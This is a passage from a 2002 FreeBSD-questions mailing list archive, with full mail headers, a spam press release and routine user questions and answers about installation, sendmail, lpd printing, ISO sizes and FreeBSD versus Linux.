NDSF9McgTxPoHGpm6U7j2aNoTxLfKRULj3aSC9eQwUXQT9Xwud4VFrQpr9fgTG7SXWmfNXl3sJk5 ksOulNEG8XFR9PN8FPSTtMXdKOgjIKqHyZ5SgES8pITNC+jLLT7sEX3osRtsg5RtBQ0hjYlXC27n IQv4ITPf14qAy9WlwfIFSRCUn28xuDfFiU6kHD/Yv2Io2R1V3qU+ibWRARqlRkdkIEU9MB7WrZ4I eOnlBJvB5SBQJuB8j0fPmEF+MgqEm5tFE0GWjXhj86ARaxuCQ3uE1cZWpYPpLH9aDPUiwvUcJNSZ GjtMdjicrcoR --logdwtu-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:14:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from bay.ein.cz (bay.ein.cz [62.24.69.193]) by hub.freebsd.org (Postfix) with ESMTP id E734E37B8EB; Tue, 25 Jun 2002 12:08:41 -0700 (PDT) Received: from oak.ein.cz (oak.ein.cz [62.24.69.194]) by bay.ein.cz (Postfix) with ESMTP id 9BCFA13E99; Tue, 25 Jun 2002 18:32:35 +0200 (CEST) Received: by oak.ein.cz (Postfix, from userid 1001) id CEFFA1C69C; Tue, 25 Jun 2002 18:31:36 +0200 (CEST) From: EIN Media To: EIN Media Subject: USA and Canada News Services Just Launched X-Author: pe@einmedia.com Message-Id: <20020625163036.2ABE51C684@oak.ein.cz> Date: Tue, 25 Jun 2002 18:30:36 +0200 (CEST) Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG A total of 51 new websites launched covering all 50 US States and Canada. Free trial subscriptions available below. For Immediate Release: Washington DC: June 25, 2002 - The European Internet Network (EIN) announced today the launch of additional news services covering all 50 US States and Canada bringing the number of separate news services published daily by EIN to 245. Free trial subscriptions are available at: http://www.europeaninternet.com/login/affiliate_register.php3 EIN provides an ideal resource for current events and research. Internet users now have a seamless selection of country by country news and information services that spans the globe. EIN's new services include daily updated news, easy access to all EIN country information sections, FREE classified advertising. The new sites are modeled after other highly popular EIN websites; UK Today, Russia Today, Central Europe Online and Inside China Today. About the European Internet Network, Inc. (www.EuropeanInternet.com) Founded in 1995, the European Internet Network (EIN) is Europe's leading publisher of English language country focused Internet sites. With a network of 245 web sites, EIN provides a unique mixture of current information and interactive features to its readers and users. EIN Home Page: http://www.europeaninternet.com. CONTACT: David Rothstein, Chief Executive Officer, European Internet Network, +1 202 223-0058 or busdev@europeaninternet.com "Central Europe Online has grown rapidly to become one of the most visible and easy-to-use information resources about the region available on the Web" -Wall Street Journal Europe. To be removed please reply to: remove@europeaninternet.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:16:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from chaos.evolve.za.net (chaos.evolve.za.net [196.34.172.107]) by hub.freebsd.org (Postfix) with ESMTP id ECF5337B92B for ; Tue, 25 Jun 2002 12:09:53 -0700 (PDT) Received: from amavis by chaos.evolve.za.net with scanned-ok (Exim 3.36 #1) id 17MvhG-000PNX-00 for freebsd-questions@FreeBSD.org; Tue, 25 Jun 2002 21:09:50 +0200 Received: from [192.168.0.56] (helo=DAVE) by chaos.evolve.za.net with smtp (Exim 3.36 #1) id 17MvhF-000PNM-00 for freebsd-questions@FreeBSD.org; Tue, 25 Jun 2002 21:09:49 +0200 Message-ID: <000b01c21c7b$e0b35740$3800a8c0@DAVE> From: "Dave Raven" To: Subject: Install - Partitions Date: Tue, 25 Jun 2002 21:09:48 +0200 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Scanned: by Opteq - www.optec.co.za Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello all, Just a quick question that I cant seem to find an answer to. I have a 4.5 install ISO, and I boot up of it and get ready to install. However, when I go to partition the drive, I am unable to create more than 4 slices, as after the 4th slice (ad0s4) they start to be labelled as X (instead of say ad0s5). Then when I goto install, I get an error about /dev/X not existing.... Its clearly not assigning labels to the later patitions, but why is this? Am I missing something or can it simply not be done? Thanks, Dave Raven. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:17:10 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-66-140-18-199.dsl.hstntx.swbell.net [66.140.18.199]) by hub.freebsd.org (Postfix) with ESMTP id 493AB37B961 for ; Tue, 25 Jun 2002 12:11:54 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 14:11:55 -0500 Reply-To: From: "Jon Noack" To: "Stephen Hovey" , "David Banning" Cc: Subject: RE: can't telnet anything on port 25 Date: Tue, 25 Jun 2002 14:11:55 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 25 Jun 2002 19:11:55.0067 (UTC) FILETIME=[2B7908B0:01C21C7C] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Port 25 is smtp (email) Yes, but you can still telnet to it (assuming it's running an external mail daemon and it's not firewalled). You can even send email. Here's a telnet to the localhost sendmail on my box: [noackjr@patriarch:~] $ telnet localhost 25 220 patriarch.dnsalias.org ESMTP Sendmail 8.12.3/8.12.3; Tue, 25 Jun 2002 14:07:57 -0500 (CDT) Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:18:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-66-140-18-199.dsl.hstntx.swbell.net [66.140.18.199]) by hub.freebsd.org (Postfix) with ESMTP id D9A9037B9FD for ; Tue, 25 Jun 2002 12:13:47 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 14:13:52 -0500 Reply-To: From: "Jon Noack" To: "Morse, Richard E." , "'Aaron Burke'" , "FreeBSD-Questions" Subject: RE: microuptime() went backwards Date: Tue, 25 Jun 2002 14:13:52 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <375F68784081D511908A00508BE3BB1701EF1BF4@phsexch22.mgh.harvard.edu> X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 25 Jun 2002 19:13:52.0861 (UTC) FILETIME=[71AEF8D0:01C21C7C] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Hi! You should do a search through the list for this, but as I recall, the > error has something to do with AMD specific hardware (a motherboard issue, I > think?). It's actually VIA chipsets, I believe. Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:19: 1 2002 Delivered-To: freebsd-questions@freebsd.org Received: from buffnet4.buffnet.net (buffnet4.buffnet.net [205.246.19.13]) by hub.freebsd.org (Postfix) with ESMTP id 4D3BD37B946 for ; Tue, 25 Jun 2002 12:16:17 -0700 (PDT) Received: from buffnet11.buffnet.net (buffnet11.buffnet.net [205.246.19.55]) by buffnet4.buffnet.net (8.9.3/8.8.7) with ESMTP id PAA40254; Tue, 25 Jun 2002 15:16:15 -0400 (EDT) (envelope-from shovey@buffnet.net) Date: Tue, 25 Jun 2002 15:16:03 -0400 (EDT) From: Stephen Hovey To: Jon Noack Cc: David Banning , questions@FreeBSD.ORG Subject: RE: can't telnet anything on port 25 In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Oh of source, if sendmail or something is running on it. That was the point I didnt explicitely make - On Tue, 25 Jun 2002, Jon Noack wrote: > > Port 25 is smtp (email) > Yes, but you can still telnet to it (assuming it's running an external mail > daemon and it's not firewalled). You can even send email. Here's a telnet > to the localhost sendmail on my box: > > [noackjr@patriarch:~] $ telnet localhost 25 > > 220 patriarch.dnsalias.org ESMTP Sendmail 8.12.3/8.12.3; Tue, 25 Jun 2002 > 14:07:57 -0500 (CDT) > > Jon > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:28:19 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jive.SoftHome.net (jive.SoftHome.net [66.54.152.27]) by hub.freebsd.org (Postfix) with SMTP id B2C3D37B401 for ; Tue, 25 Jun 2002 12:28:15 -0700 (PDT) Received: (qmail 5405 invoked by uid 417); 25 Jun 2002 19:28:04 -0000 Received: from shunt-smtp-out-0 (HELO softhome.net) (172.16.3.12) by shunt-smtp-out-0 with SMTP; 25 Jun 2002 19:28:04 -0000 Received: from softhome.net ([63.194.84.111]) (AUTH: PLAIN temperanza@softhome.net) by softhome.net with esmtp; Tue, 25 Jun 2002 13:28:04 -0600 Message-ID: <3D18C443.2070207@softhome.net> Date: Tue, 25 Jun 2002 12:28:03 -0700 From: La Temperanza User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0.0) Gecko/20020612 X-Accept-Language: en-us, en MIME-Version: 1.0 To: questions@FreeBSD.ORG Subject: Several questions... References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG 1. Can I reduce the traffic of the digests here somehow? 2 or 3 a day would be really nice. 2. After I've made a new port, how would I go about getting it included in the main tree? 3. From the first time I've rebuilt my base system, I've been getting proc size mismatches such as this: kvm_open: proc size mismatch (48576 total, 1064 chunks) top: Out of memory. I've tried rebuilding various components at various times with various optimization settings, no luck so far. Mainly, I want to diagnose the exact problem here, since it doesn't seem to be as simple as what the handbook describes. How should I start? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:31:35 2002 Delivered-To: freebsd-questions@freebsd.org Received: from jrpenn.demon.co.uk (jrpenn.demon.co.uk [194.222.241.254]) by hub.freebsd.org (Postfix) with ESMTP id 69C3B37B400 for ; Tue, 25 Jun 2002 12:31:28 -0700 (PDT) Received: from jrpenn.demon.co.uk (localhost [127.0.0.1]) by jrpenn.demon.co.uk (8.12.3/8.11.6) with ESMTP id g5PAsUsZ000347 for ; Tue, 25 Jun 2002 11:54:33 +0100 (BST) (envelope-from jeff@jrpenn.demon.co.uk) Received: (from jeff@localhost) by jrpenn.demon.co.uk (8.12.3/8.12.3/Submit) id g5PArWx3000332 for freebsd-questions@freebsd.org; Tue, 25 Jun 2002 11:53:32 +0100 (BST) Date: Tue, 25 Jun 2002 11:53:32 +0100 From: Jeff Penn To: freebsd-questions@freebsd.org Subject: 4.6 sendmail: No local mailer defined Message-ID: <20020625115332.A250@jrpenn.demon.co.uk> Mail-Followup-To: freebsd-questions@freebsd.org Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I had a problem with sendmail after upgrading from 4.5 to 4.6. The most likely cause is a mistake running mergemaster & mergemaster -C, which caused the following problem: jrpenn# tail /var/log/messages Jun 24 21:21:04 jrpenn named[102]: db_load could not open: localhost-v6.rev: No such file or directory Jun 24 21:21:04 jrpenn named[103]: Ready to answer queries. Jun 24 21:21:05 jrpenn sm-mta[115]: NOQUEUE: SYSERR(root): No local mailer defin ed Jun 24 21:21:05 jrpenn sm-mta[115]: NOQUEUE: SYSERR(root): QueueDirectory (Q) op tion must be set Jun 24 21:21:24 jrpenn login: ROOT LOGIN (root) ON ttyv0 Jun 24 21:25:32 jrpenn su: jeff to root on /dev/ttyp1 I noticed that sendmail.cf consisted only of the comments at the head of the file. Restoring a backup copy appears to have resolved this issue. I also needed to touch /var/log/auth.log after syslogd complained it was AWOL when starting up. Any ideas what caused my problem? (I can't recall reading of anyone else having problems). I had a look at /etc/mail/Makefile & noticed the make cf option. Running this created jeff@jrpenn.demon.co.uk with .mc & cf extensions. Do I only need to rename these files to create an updated sendmail.cf?, or do I only need to rename freebsd.cf? (apologies for not being brave enough to wade through the sendmail documentation). Should sendmail.cf be updated when running a new version of sendmail to take advantage of new features?. thanks Jeff To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:36:20 2002 Delivered-To: freebsd-questions@freebsd.org Received: from clink.schulte.org (clink.schulte.org [209.134.156.193]) by hub.freebsd.org (Postfix) with ESMTP id 0336237B403 for ; Tue, 25 Jun 2002 12:36:15 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by clink.schulte.org (Postfix) with ESMTP id C43C5243CF; Tue, 25 Jun 2002 14:36:13 -0500 (CDT) Received: from schulte-laptop.nospam.schulte.org (nb-65.netbriefings.com [209.134.134.65]) by clink.schulte.org (Postfix) with ESMTP id 6F271243BE; Tue, 25 Jun 2002 14:36:11 -0500 (CDT) Message-Id: <5.1.1.6.2.20020625143148.0421d118@pop3s.schulte.org> X-Sender: X-Mailer: QUALCOMM Windows Eudora Version 5.1.1 Date: Tue, 25 Jun 2002 14:33:35 -0500 To: La Temperanza , questions@FreeBSD.ORG From: Christopher Schulte Subject: Re: Several questions... In-Reply-To: <3D18C443.2070207@softhome.net> References: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by AMaViS 0.3.12pre6 on clink.schulte.org Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG At 12:28 PM 6/25/2002 -0700, La Temperanza wrote: >1. Can I reduce the traffic of the digests here somehow? 2 or 3 a day >would be really nice. That I'm not sure of... send majordomo a help request and it will tell you what the options are. >2. After I've made a new port, how would I go about getting it included in >the main tree? That should be in the faq. >3. From the first time I've rebuilt my base system, I've been getting proc >size mismatches such as this: > >kvm_open: proc size mismatch (48576 total, 1064 chunks) >top: Out of memory. > >I've tried rebuilding various components at various times with various >optimization settings, no luck so far. Mainly, I want to diagnose the >exact problem here, since it doesn't seem to be as simple as what the >handbook describes. How should I start? Also in the faq (I believe) and possible answer found easily via http://groups.google.com/ Make sure your kernel and userland are in sync. -- Christopher Schulte http://www.schulte.org/ Do not un-munge my @nospam.schulte.org email address. This address is valid. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:37:17 2002 Delivered-To: freebsd-questions@freebsd.org Received: from alpha.yumyumyum.org (dsl092-171-091.wdc1.dsl.speakeasy.net [66.92.171.91]) by hub.freebsd.org (Postfix) with ESMTP id 7AFEF37B427 for ; Tue, 25 Jun 2002 12:36:52 -0700 (PDT) Received: from alpha.yumyumyum.org (localhost [127.0.0.1]) by alpha.yumyumyum.org (8.12.3/8.12.3) with ESMTP id g5PJacx7009887; Tue, 25 Jun 2002 15:36:42 -0400 (EDT) (envelope-from culverk@yumyumyum.org) Received: from localhost (culverk@localhost) by alpha.yumyumyum.org (8.12.3/8.12.3/Submit) with ESMTP id g5PJabcm009884; Tue, 25 Jun 2002 15:36:38 -0400 (EDT) (envelope-from culverk@yumyumyum.org) X-Authentication-Warning: alpha.yumyumyum.org: culverk owned process doing -bs Date: Tue, 25 Jun 2002 15:36:37 -0400 (EDT) From: Kenneth Culver To: Ganesh Kumar Cc: freebsd-questions@FreeBSD.ORG Subject: Re: ISO file huuuge ! In-Reply-To: Message-ID: <20020625153552.L9850-100000@alpha.yumyumyum.org> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG It's up to you to make sure you don't put too much data in an iso when you're specifying what you want in it... oh and there's no way a 1024MB iso will fit on any CD I know of.... Ken On Tue, 25 Jun 2002, Ganesh Kumar wrote: > Hi, > I created a ISO with mkisofs command.But the size is now > 1024MB(vannila,rockridge and jolleit) which will hardly fit in to a normal > CD. > > I would like to give this to the Windows users for installation. > > So shall I give only roockridge and jolliet ? Will they be able to install > on that ? > > > regards > Ganesh Kumar > > > > _________________________________________________________________ > Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:39: 9 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailer.cia-g.com (mailer.cia-g.com [65.100.115.10]) by hub.freebsd.org (Postfix) with ESMTP id ABA1937B404 for ; Tue, 25 Jun 2002 12:38:40 -0700 (PDT) Received: from cygnus.cia-g.com (data.cia-g.com [65.100.119.165]) by mailer.cia-g.com (Postfix) with ESMTP id B898835AC; Tue, 25 Jun 2002 13:55:36 -0600 (MDT) Received: from raz by cygnus.cia-g.com with local (Exim 3.12 #1 (Debian)) id 17Mw99-0006nH-00; Tue, 25 Jun 2002 13:38:39 -0600 Date: Tue, 25 Jun 2002 13:38:39 -0600 From: David Wilk To: Christopher Schulte Cc: David Wilk , Fernando Gleiser , David Kramer , freebsd-questions@FreeBSD.ORG Subject: Re: FreeBSD, Linux or Solaris Message-ID: <20020625133839.A22573@cygnus.wks.Gallup.cia-g.com> References: <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org> <20020625135153.M403-100000@localhost> <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org> <20020625120402.A7861@cygnus.wks.Gallup.cia-g.com> <5.1.1.6.2.20020625132254.046a0f00@pop3s.schulte.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <5.1.1.6.2.20020625132254.046a0f00@pop3s.schulte.org>; from schulte+freebsd@nospam.schulte.org on Tue, Jun 25, 2002 at 01:42:36PM -0500 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Yes, absolutely. Your approach is well balanced and logical. Although relatively new to BSD, there's alot I really like about it. Even the linux fans (well most anyway) drool with envy when it comes to FreeBSD's VMS and VFS among others. I find I no longer want wiz-bang, but more reliability. I want to dump a huge load on my server, leave it for a couple years, and come back to find it churning away just fine. I have no doubts about FreeBSD here. Anyway, didn't mean to rant, just to give props to the Debian folk who have the most FreeBSD of all linux distros (well, save for the sysV init...) On Tue, Jun 25, 2002 at 01:42:36PM -0500 or thereabouts, Christopher Schulte wrote: > At 12:04 PM 6/25/2002 -0600, David Wilk wrote: > >However, I gotta disagree with the linux comments. First, the linux kernel > >is developed independant of the distributions, but not without regard to the > >userland utilities that it will work closely with. Second, it is the > >distributions job to integrate these two worlds so that they work seamlessly. > >Third, if you have not tried it, check out Debian. This *huge* group of > >developers work very hard to make an incredibly large number of packages > >available that are all tested as part of a complete system. Package > >management > >is awesome. two commands bring your installed base up-to-date with both > >security > >and bugfixes - services shutdown and restarted automagically. Releases take > >a while, so a system can seem a bit out-of-date, but are always solid. > > Thanks for the Debian heads up. I'll certainly give that a whack next time > I have time to evaluate new OS distributions. > > >having the kernel separate from the system has the advantage of being able to > >do a complete release upgrade without taking down the system (you lose each > >service for a few seconds), or, upgrading the kernel for some new feature > >without having to upgrade the entire system. > > FreeBSD is much more anal about userland/kernel synchronization than > linux. If you just want to compile a new kernel without updating the > source, that is easily done. `make kernel KERNCONF=MYBOX` > > If you need to update your kernel source to use a newly imported feature or > bugfix, then officially you must also update your userland world. On the > upside of this downside: the process is implemented well, and when done > with care should not cause problems. > > Keep in mind there are situations even in linux where newer libraries > (libc?) do need a minimum kernel revision..... but yes it's generally much > more flexible than FreeBSD in this respect. I myself do not place a high > weight on this due to my systems' configurations and update routines. > > As always, YMMV. Try a few different systems, use the one which jives best > with your personality, requirements, and environment. > > >Dave > > -- > Christopher Schulte > http://www.schulte.org/ > Do not un-munge my @nospam.schulte.org > email address. This address is valid. > -- ******************************* David Wilk System Administrator Community Internet Access, Inc. admin@cia-g.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:41:49 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.melim.com.br (salseiros.melim.com.br [200.215.110.23]) by hub.freebsd.org (Postfix) with ESMTP id 1A9C037B400 for ; Tue, 25 Jun 2002 12:41:41 -0700 (PDT) Received: from praiadosamores.melim.com.br (praiadosamores.melim.com.br [200.215.110.20]) by mail.melim.com.br (Postfix) with SMTP id B47FBBA4F; Tue, 25 Jun 2002 16:41:33 -0300 (BRT) Date: Tue, 25 Jun 2002 16:41:33 -0300 From: Ronan Lucio To: Warren Block Cc: freebsd-questions@FreeBSD.ORG Subject: Re: LPD Error Message-Id: <20020625164133.2d79c377.ronanl@melim.com.br> In-Reply-To: References: <20020624163330.4db03459.ronanl@melim.com.br> Organization: Melim Internet X-Mailer: Sylpheed version 0.7.4 (GTK+ 1.2.10; i386-portbld-freebsd4.5) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello Warren, Good news... :-) Print server is working fine now Unfortunatly, I don't know exactly what realy makes it work because a employee that works in such enterprise have said to me he changed a permission of one file (I don't know how) and rcp starts working (it wans't working, too) today. So, I don't know if it starts working because of the changes that either i made today or the changes that he made today. Now, the files are figured this way: /etc/printcap ======================================= lp|local line printer:\ :lp=/dev/lpt0:sd=/var/spool/lpd/lp: \ :mx#0:so:sh:sb:of=/usr/lib/lp/filters/filter:sf spo:\ :mx#0:rm=spo:rp=lp:sd=/var/spool/lpd/spo: ======================================= # ls -l /var/spool/lpd/spo/ total 4 -rw-rw-r-- 1 root daemon 16 Jun 25 16:14 lock -rw-rw-r-- 1 root daemon 15 Jun 25 16:14 status Warren, thank you very much for your help. It's realy helped me a lot. Ronan On Mon, 24 Jun 2002 16:49:46 -0600 (MDT) Warren Block wrote: > On Mon, 24 Jun 2002, Ronan Lucio wrote: > > > Hello Warren, > > > > > > But, if it's wrong, how should I set the users permissions? > > > > > > chown -R daemon.daemon /var/spool/output/lpd/spo > > > > I've did it but the lpd still don't work... :-/ > > Whoops--my brain finally got back to me on this. lpd runs filters as > user daemon, so I'm used to setting ownership of these directories that > way. Let me try again. > > Just to make sure things are clear: > > The FreeBSD system is receiving print jobs. It's then sending them on > to the queue called "lp" on "spo", another machine or print server. > > Right? (You've got filtered queues also, but let's do this one first.) > > I've compared your printcap to mine, and there are some differences. > Here's a printcap entry I use to talk to my HP4M laser on the network. > > lpraw:\ > :lp=:\ > :sh:\ > :mx#0:\ > :rm=hp4m:\ > :rp="raw":\ > :sd=/var/spool/output/lpd/lpraw:\ > :lf=/var/log/lpd-errs: > > I'm not sure which of these are optional, but it won't hurt to have the > extras. So your printcap entry for this machine should be: > > spo:\ > :lp=:\ > :sh=:\ > :mx#0:\ > :rm=spo:\ > :rp="lp":\ > :sd=/var/spool/lpd/spo:\ > :lf=/var/log/lpd-errs: > > The difference is that lp= is defined (as undefined!), and a log file is > defined. > > Owner of the /var/spool/lpd/spo directory is root.daemon, and > permissions of the files in it (lock and status) are 664: > > chmod 664 /var/spool/lpd/spo > > Now... with those settings, does your system process print jobs for spo? > > -Warren Block * Rapid City, South Dakota USA > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:43: 0 2002 Delivered-To: freebsd-questions@freebsd.org Received: from www.technaholics.com (12-218-133-12.client.mchsi.com [12.218.133.12]) by hub.freebsd.org (Postfix) with ESMTP id CCAAC37B408 for ; Tue, 25 Jun 2002 12:42:40 -0700 (PDT) Received: from bedrock.hboc.com (hboc.com [139.177.224.128]) by www.technaholics.com (8.11.3/8.11.3) with SMTP id g5PJgMr06677; Tue, 25 Jun 2002 14:42:23 -0500 (CDT) (envelope-from chadalbert@mchsi.com) Message-ID: <002301c21c80$69e4a920$51b41595@SPGCALBERTA> From: "Chad Albert" To: "John Martinez" , Received: from [149.21.180.81] by bedrock.hboc.com via smtpd (for 12-218-133-12.client.mchsi.com [12.218.133.12]) with SMTP; 25 Jun 2002 19:42:22 UT References: <3D18BEAE.80200@mtbiker.net> Subject: Re: I hate to bring it up again (spamming) Date: Tue, 25 Jun 2002 14:42:09 -0500 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Or has anyone just sent him a friendly "You have a virus" email? ----- Original Message ----- From: "John Martinez" To: Sent: Tuesday, June 25, 2002 2:04 PM Subject: I hate to bring it up again (spamming) > > Can one of the list admins please block Edwin Renders (or whoever it is) > from posting the stupid DOS files on this list? > > I use Windows at work occasionally, but I'm not susceptible on my > Solaris, FreeBSD or Mac OS X boxes from having problems with .scr files. > > It's just ANNOYING!!! > > Thanks, > -john > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.372 / Virus Database: 207 - Release Date: 6/20/2002 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:46:56 2002 Delivered-To: freebsd-questions@freebsd.org Received: from patriarch.dnsalias.org (adsl-66-140-18-199.dsl.hstntx.swbell.net [66.140.18.199]) by hub.freebsd.org (Postfix) with ESMTP id CBF3937B400 for ; Tue, 25 Jun 2002 12:46:52 -0700 (PDT) Received: from compgeek ([127.0.0.1]) by patriarch.dnsalias.org with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 14:46:57 -0500 Reply-To: From: "Jon Noack" To: Subject: RE: FreeBSD, Linux or Solaris Date: Tue, 25 Jun 2002 14:46:57 -0500 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0) In-Reply-To: <20020625133839.A22573@cygnus.wks.Gallup.cia-g.com> X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Importance: Normal X-OriginalArrivalTime: 25 Jun 2002 19:46:57.0607 (UTC) FILETIME=[10AF2D70:01C21C81] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > Anyway, didn't mean to rant, just to give props to the Debian > folk who have the most FreeBSD of all linux distros (well, > save for the sysV init...) Completely off-topic, but I'm posting anyway... Anyone used Gentoo? I like what I hear about emerge, and I'd like to have a more FreeBSD-ish Linux distro for those situations (read: clients) that demand Linux. Jon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 12:49:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta02-svc.ntlworld.com 